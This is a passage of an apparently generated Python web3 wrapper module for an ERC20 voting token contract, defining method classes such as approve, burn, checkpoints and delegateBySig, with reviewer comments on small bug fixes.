    """Various interfaces to the DEFAULT_ADMIN_ROLE method."""
    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        # Bound web3 ContractFunction for the on-chain method.
        self._underlying_method = contract_function
    def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
        """Execute underlying contract method via eth_call.
        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method().call(tx_params.as_dict())
        # BUG FIX: the generated `return Union[bytes, str](returned)`
        # raised "TypeError: Cannot instantiate typing.Union" -- typing
        # special forms are not callable.  web3 already hands back a
        # bytes-like value here, so return it unchanged.
        return returned
    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.
        :param tx_params: transaction parameters
        """
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(tx_params.as_dict())
    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(tx_params.as_dict())
    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(tx_params.as_dict())
class DomainSeparatorMethod(ContractMethod): # pylint: disable=invalid-name
    """Various interfaces to the DOMAIN_SEPARATOR method."""
    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        # Bound web3 ContractFunction for the on-chain method.
        self._underlying_method = contract_function
    def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
        """Execute underlying contract method via eth_call.
        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method().call(tx_params.as_dict())
        # BUG FIX: the generated `return Union[bytes, str](returned)`
        # raised "TypeError: Cannot instantiate typing.Union" -- typing
        # special forms are not callable.  web3 already hands back a
        # bytes-like value here, so return it unchanged.
        return returned
    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.
        :param tx_params: transaction parameters
        """
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(tx_params.as_dict())
    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(tx_params.as_dict())
    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(tx_params.as_dict())
# Generated wrapper (see module docstring): code kept byte-identical,
# comments only.
class AllowanceMethod(ContractMethod): # pylint: disable=invalid-name
    """Various interfaces to the allowance method."""
    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        # NOTE(review): default None -- assert_valid below would fail
        # unless the ContractMethod base installs a fallback; confirm.
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        # Bound web3 ContractFunction for the contract's `allowance` entry.
        self._underlying_method = contract_function
    def validate_and_normalize_inputs(self, owner: str, spender: str):
        """Validate the inputs to the allowance method."""
        self.validator.assert_valid(
            method_name="allowance",
            parameter_name="owner",
            argument_value=owner,
        )
        # Convert to the checksummed address form web3 expects.
        owner = self.validate_and_checksum_address(owner)
        self.validator.assert_valid(
            method_name="allowance",
            parameter_name="spender",
            argument_value=spender,
        )
        spender = self.validate_and_checksum_address(spender)
        return (owner, spender)
    def call(
        self, owner: str, spender: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Execute underlying contract method via eth_call.
        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (owner, spender) = self.validate_and_normalize_inputs(owner, spender)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(owner, spender).call(
            tx_params.as_dict()
        )
        return int(returned)
    def send_transaction(
        self, owner: str, spender: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.
        :param tx_params: transaction parameters
        """
        (owner, spender) = self.validate_and_normalize_inputs(owner, spender)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(owner, spender).transact(
            tx_params.as_dict()
        )
    def build_transaction(
        self, owner: str, spender: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (owner, spender) = self.validate_and_normalize_inputs(owner, spender)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(owner, spender).buildTransaction(
            tx_params.as_dict()
        )
    def estimate_gas(
        self, owner: str, spender: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        (owner, spender) = self.validate_and_normalize_inputs(owner, spender)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(owner, spender).estimateGas(
            tx_params.as_dict()
        )
# Generated wrapper (see module docstring): code kept byte-identical,
# comments only.
class ApproveMethod(ContractMethod): # pylint: disable=invalid-name
    """Various interfaces to the approve method."""
    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        # Bound web3 ContractFunction for the contract's `approve` entry.
        self._underlying_method = contract_function
    def validate_and_normalize_inputs(self, spender: str, amount: int):
        """Validate the inputs to the approve method."""
        self.validator.assert_valid(
            method_name="approve",
            parameter_name="spender",
            argument_value=spender,
        )
        # Convert to the checksummed address form web3 expects.
        spender = self.validate_and_checksum_address(spender)
        self.validator.assert_valid(
            method_name="approve",
            parameter_name="amount",
            argument_value=amount,
        )
        # safeguard against fractional inputs
        amount = int(amount)
        return (spender, amount)
    def call(
        self, spender: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> bool:
        """Execute underlying contract method via eth_call.
        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (spender, amount) = self.validate_and_normalize_inputs(spender, amount)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(spender, amount).call(
            tx_params.as_dict()
        )
        return bool(returned)
    def send_transaction(
        self, spender: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.
        :param tx_params: transaction parameters
        """
        (spender, amount) = self.validate_and_normalize_inputs(spender, amount)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(spender, amount).transact(
            tx_params.as_dict()
        )
    def build_transaction(
        self, spender: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (spender, amount) = self.validate_and_normalize_inputs(spender, amount)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(spender, amount).buildTransaction(
            tx_params.as_dict()
        )
    def estimate_gas(
        self, spender: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        (spender, amount) = self.validate_and_normalize_inputs(spender, amount)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(spender, amount).estimateGas(
            tx_params.as_dict()
        )
# Generated wrapper (see module docstring): code kept byte-identical,
# comments only.
class BalanceOfMethod(ContractMethod): # pylint: disable=invalid-name
    """Various interfaces to the balanceOf method."""
    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        # Bound web3 ContractFunction for the contract's `balanceOf` entry.
        self._underlying_method = contract_function
    def validate_and_normalize_inputs(self, account: str):
        """Validate the inputs to the balanceOf method."""
        self.validator.assert_valid(
            method_name="balanceOf",
            parameter_name="account",
            argument_value=account,
        )
        # Convert to the checksummed address form web3 expects.
        account = self.validate_and_checksum_address(account)
        return account
    def call(self, account: str, tx_params: Optional[TxParams] = None) -> int:
        """Execute underlying contract method via eth_call.
        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        # Note: `(account) = ...` is plain assignment, not tuple unpacking.
        (account) = self.validate_and_normalize_inputs(account)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(account).call(tx_params.as_dict())
        return int(returned)
    def send_transaction(
        self, account: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.
        :param tx_params: transaction parameters
        """
        (account) = self.validate_and_normalize_inputs(account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account).transact(tx_params.as_dict())
    def build_transaction(
        self, account: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (account) = self.validate_and_normalize_inputs(account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account).buildTransaction(
            tx_params.as_dict()
        )
    def estimate_gas(
        self, account: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        (account) = self.validate_and_normalize_inputs(account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account).estimateGas(
            tx_params.as_dict()
        )
# Generated wrapper (see module docstring): code kept byte-identical,
# comments only.
class BurnMethod(ContractMethod): # pylint: disable=invalid-name
    """Various interfaces to the burn method."""
    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        # Bound web3 ContractFunction for the contract's `burn` entry.
        self._underlying_method = contract_function
    def validate_and_normalize_inputs(self, amount: int):
        """Validate the inputs to the burn method."""
        self.validator.assert_valid(
            method_name="burn",
            parameter_name="amount",
            argument_value=amount,
        )
        # safeguard against fractional inputs
        amount = int(amount)
        return amount
    def call(self, amount: int, tx_params: Optional[TxParams] = None) -> None:
        """Execute underlying contract method via eth_call.
        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        # burn returns nothing on-chain, so this call discards the result.
        (amount) = self.validate_and_normalize_inputs(amount)
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(amount).call(tx_params.as_dict())
    def send_transaction(
        self, amount: int, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.
        :param tx_params: transaction parameters
        """
        (amount) = self.validate_and_normalize_inputs(amount)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(amount).transact(tx_params.as_dict())
    def build_transaction(
        self, amount: int, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (amount) = self.validate_and_normalize_inputs(amount)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(amount).buildTransaction(
            tx_params.as_dict()
        )
    def estimate_gas(
        self, amount: int, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        (amount) = self.validate_and_normalize_inputs(amount)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(amount).estimateGas(tx_params.as_dict())
# Generated wrapper (see module docstring): code kept byte-identical,
# comments only.
class BurnFromMethod(ContractMethod): # pylint: disable=invalid-name
    """Various interfaces to the burnFrom method."""
    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        # Bound web3 ContractFunction for the contract's `burnFrom` entry.
        self._underlying_method = contract_function
    def validate_and_normalize_inputs(self, account: str, amount: int):
        """Validate the inputs to the burnFrom method."""
        self.validator.assert_valid(
            method_name="burnFrom",
            parameter_name="account",
            argument_value=account,
        )
        # Convert to the checksummed address form web3 expects.
        account = self.validate_and_checksum_address(account)
        self.validator.assert_valid(
            method_name="burnFrom",
            parameter_name="amount",
            argument_value=amount,
        )
        # safeguard against fractional inputs
        amount = int(amount)
        return (account, amount)
    def call(
        self, account: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> None:
        """Execute underlying contract method via eth_call.
        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        # burnFrom returns nothing on-chain; the result is discarded.
        (account, amount) = self.validate_and_normalize_inputs(account, amount)
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(account, amount).call(tx_params.as_dict())
    def send_transaction(
        self, account: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.
        :param tx_params: transaction parameters
        """
        (account, amount) = self.validate_and_normalize_inputs(account, amount)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account, amount).transact(
            tx_params.as_dict()
        )
    def build_transaction(
        self, account: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (account, amount) = self.validate_and_normalize_inputs(account, amount)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account, amount).buildTransaction(
            tx_params.as_dict()
        )
    def estimate_gas(
        self, account: str, amount: int, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        (account, amount) = self.validate_and_normalize_inputs(account, amount)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(account, amount).estimateGas(
            tx_params.as_dict()
        )
class CheckpointsMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the checkpoints method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        # Bound web3 function object used by the accessors below.
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, account: str, pos: int):
        """Check and normalize the arguments to the checkpoints method."""
        self.validator.assert_valid(
            method_name="checkpoints",
            parameter_name="account",
            argument_value=account,
        )
        account = self.validate_and_checksum_address(account)
        self.validator.assert_valid(
            method_name="checkpoints",
            parameter_name="pos",
            argument_value=pos,
        )
        return (account, pos)

    def call(
        self, account: str, pos: int, tx_params: Optional[TxParams] = None
    ) -> ERC20VotesUpgradeableCheckpoint:
        """Invoke the underlying contract method read-only via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        account, pos = self.validate_and_normalize_inputs(account, pos)
        params = super().normalize_tx_params(tx_params).as_dict()
        raw = self._underlying_method(account, pos).call(params)
        # Re-shape the positional ABI tuple into the named checkpoint struct.
        return ERC20VotesUpgradeableCheckpoint(
            fromBlock=raw[0],
            votes=raw[1],
        )

    def send_transaction(
        self, account: str, pos: int, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        account, pos = self.validate_and_normalize_inputs(account, pos)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account, pos).transact(params)

    def build_transaction(
        self, account: str, pos: int, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Assemble calldata suitable for use as input to the method."""
        account, pos = self.validate_and_normalize_inputs(account, pos)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account, pos).buildTransaction(params)

    def estimate_gas(
        self, account: str, pos: int, tx_params: Optional[TxParams] = None
    ) -> int:
        """Return an estimate of the gas consumed by the method call."""
        account, pos = self.validate_and_normalize_inputs(account, pos)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account, pos).estimateGas(params)
class ContractTypeMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the contractType method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data.

        :param web3_or_provider: web3 instance or raw provider for RPC calls
        :param contract_address: address of the deployed contract
        :param contract_function: bound web3 ContractFunction for contractType
        """
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> Union[bytes, str]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the bytes32 value returned by the contract.
        """
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method().call(tx_params.as_dict())
        # BUG FIX: the generated code returned ``Union[bytes, str](returned)``,
        # but typing.Union is a special form and is not callable — that line
        # raised ``TypeError`` on every invocation. web3 has already decoded
        # the value, so return it unchanged.
        return returned

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().transact(tx_params.as_dict())

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().buildTransaction(tx_params.as_dict())

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method().estimateGas(tx_params.as_dict())
class ContractUriMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the contractURI method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        # Bound web3 function object used by the accessors below.
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Invoke the underlying contract method read-only via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method().call(params))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Assemble calldata suitable for use as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Return an estimate of the gas consumed by the method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class ContractVersionMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the contractVersion method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        # Bound web3 function object used by the accessors below.
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> int:
        """Invoke the underlying contract method read-only via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method().call(params))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Assemble calldata suitable for use as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Return an estimate of the gas consumed by the method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class DecimalsMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the decimals method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        # Bound web3 function object used by the accessors below.
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> int:
        """Invoke the underlying contract method read-only via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method().call(params))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Assemble calldata suitable for use as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Return an estimate of the gas consumed by the method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class DecreaseAllowanceMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the decreaseAllowance method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        # Bound web3 function object used by the accessors below.
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, spender: str, subtracted_value: int
    ):
        """Check and normalize the arguments to the decreaseAllowance method."""
        self.validator.assert_valid(
            method_name="decreaseAllowance",
            parameter_name="spender",
            argument_value=spender,
        )
        spender = self.validate_and_checksum_address(spender)
        self.validator.assert_valid(
            method_name="decreaseAllowance",
            parameter_name="subtractedValue",
            argument_value=subtracted_value,
        )
        # Coerce to int so a fractional amount cannot slip through.
        subtracted_value = int(subtracted_value)
        return (spender, subtracted_value)

    def call(
        self,
        spender: str,
        subtracted_value: int,
        tx_params: Optional[TxParams] = None,
    ) -> bool:
        """Invoke the underlying contract method read-only via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        spender, subtracted_value = self.validate_and_normalize_inputs(
            spender, subtracted_value
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        raw = self._underlying_method(spender, subtracted_value).call(params)
        return bool(raw)

    def send_transaction(
        self,
        spender: str,
        subtracted_value: int,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Broadcast the underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        spender, subtracted_value = self.validate_and_normalize_inputs(
            spender, subtracted_value
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(spender, subtracted_value).transact(
            params
        )

    def build_transaction(
        self,
        spender: str,
        subtracted_value: int,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Assemble calldata suitable for use as input to the method."""
        spender, subtracted_value = self.validate_and_normalize_inputs(
            spender, subtracted_value
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(
            spender, subtracted_value
        ).buildTransaction(params)

    def estimate_gas(
        self,
        spender: str,
        subtracted_value: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Return an estimate of the gas consumed by the method call."""
        spender, subtracted_value = self.validate_and_normalize_inputs(
            spender, subtracted_value
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(spender, subtracted_value).estimateGas(
            params
        )
class DelegateMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the delegate method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        # Bound web3 function object used by the accessors below.
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, delegatee: str):
        """Check and normalize the arguments to the delegate method."""
        self.validator.assert_valid(
            method_name="delegate",
            parameter_name="delegatee",
            argument_value=delegatee,
        )
        delegatee = self.validate_and_checksum_address(delegatee)
        return delegatee

    def call(
        self, delegatee: str, tx_params: Optional[TxParams] = None
    ) -> None:
        """Invoke the underlying contract method read-only via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        delegatee = self.validate_and_normalize_inputs(delegatee)
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(delegatee).call(params)

    def send_transaction(
        self, delegatee: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        delegatee = self.validate_and_normalize_inputs(delegatee)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(delegatee).transact(params)

    def build_transaction(
        self, delegatee: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Assemble calldata suitable for use as input to the method."""
        delegatee = self.validate_and_normalize_inputs(delegatee)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(delegatee).buildTransaction(params)

    def estimate_gas(
        self, delegatee: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Return an estimate of the gas consumed by the method call."""
        delegatee = self.validate_and_normalize_inputs(delegatee)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(delegatee).estimateGas(params)
class DelegateBySigMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the delegateBySig method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        # Bound web3 function object used by the accessors below.
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self,
        delegatee: str,
        nonce: int,
        expiry: int,
        v: int,
        r: Union[bytes, str],
        s: Union[bytes, str],
    ):
        """Check and normalize the arguments to the delegateBySig method."""
        self.validator.assert_valid(
            method_name="delegateBySig",
            parameter_name="delegatee",
            argument_value=delegatee,
        )
        delegatee = self.validate_and_checksum_address(delegatee)
        self.validator.assert_valid(
            method_name="delegateBySig",
            parameter_name="nonce",
            argument_value=nonce,
        )
        # Coerce to int so a fractional value cannot slip through.
        nonce = int(nonce)
        self.validator.assert_valid(
            method_name="delegateBySig",
            parameter_name="expiry",
            argument_value=expiry,
        )
        # Coerce to int so a fractional value cannot slip through.
        expiry = int(expiry)
        self.validator.assert_valid(
            method_name="delegateBySig",
            parameter_name="v",
            argument_value=v,
        )
        self.validator.assert_valid(
            method_name="delegateBySig",
            parameter_name="r",
            argument_value=r,
        )
        self.validator.assert_valid(
            method_name="delegateBySig",
            parameter_name="s",
            argument_value=s,
        )
        return (delegatee, nonce, expiry, v, r, s)

    def call(
        self,
        delegatee: str,
        nonce: int,
        expiry: int,
        v: int,
        r: Union[bytes, str],
        s: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Invoke the underlying contract method read-only via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        delegatee, nonce, expiry, v, r, s = self.validate_and_normalize_inputs(
            delegatee, nonce, expiry, v, r, s
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(delegatee, nonce, expiry, v, r, s).call(params)

    def send_transaction(
        self,
        delegatee: str,
        nonce: int,
        expiry: int,
        v: int,
        r: Union[bytes, str],
        s: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Broadcast the underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        delegatee, nonce, expiry, v, r, s = self.validate_and_normalize_inputs(
            delegatee, nonce, expiry, v, r, s
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(
            delegatee, nonce, expiry, v, r, s
        ).transact(params)

    def build_transaction(
        self,
        delegatee: str,
        nonce: int,
        expiry: int,
        v: int,
        r: Union[bytes, str],
        s: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Assemble calldata suitable for use as input to the method."""
        delegatee, nonce, expiry, v, r, s = self.validate_and_normalize_inputs(
            delegatee, nonce, expiry, v, r, s
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(
            delegatee, nonce, expiry, v, r, s
        ).buildTransaction(params)

    def estimate_gas(
        self,
        delegatee: str,
        nonce: int,
        expiry: int,
        v: int,
        r: Union[bytes, str],
        s: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Return an estimate of the gas consumed by the method call."""
        delegatee, nonce, expiry, v, r, s = self.validate_and_normalize_inputs(
            delegatee, nonce, expiry, v, r, s
        )
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(
            delegatee, nonce, expiry, v, r, s
        ).estimateGas(params)
class DelegatesMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the delegates method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        # Bound web3 function object used by the accessors below.
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, account: str):
        """Check and normalize the arguments to the delegates method."""
        self.validator.assert_valid(
            method_name="delegates",
            parameter_name="account",
            argument_value=account,
        )
